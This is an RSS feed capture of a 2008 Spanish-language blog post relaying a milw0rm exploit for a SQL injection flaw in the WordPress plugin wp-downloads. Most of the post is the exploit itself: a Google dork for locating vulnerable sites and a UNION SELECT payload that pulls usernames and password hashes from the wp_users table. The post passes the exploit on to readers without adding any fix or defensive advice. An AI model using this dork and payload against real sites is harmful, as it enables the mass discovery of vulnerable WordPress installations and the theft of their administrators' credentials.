Exactlimon y la web 2.0 » vulnerabilidades http://exactlimon.com las paginas web mas interesantes, mundo geek, seguridad informatica, web 2.0 Thu, 12 Jan 2012 20:14:19 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 http://exactlimon.com http://exactlimon.com/favicon2.ico Exactlimon y la web 2.0 vulnerabilidad en un plugin de wordpress http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html#comments Tue, 01 Apr 2008 05:12:39 +0000 admin http://www.exactlimon.com/?p=60

hoy mediante el blog de mi amigo neri

me informe sobre una vulnerabilidad que afecta un plugin de wordpress el cual se llama wp-downloads
el plugin es vbulnerable a una inyeccion SQL.

el exploit fue subido a milw0rm aca les dejo el codigo

url: http://milw0rm.com/exploits/5326
###############################################################
#
# WordPress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:

http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]

SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# milw0rm.com [2008-03-31]
]]> http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html/feed 0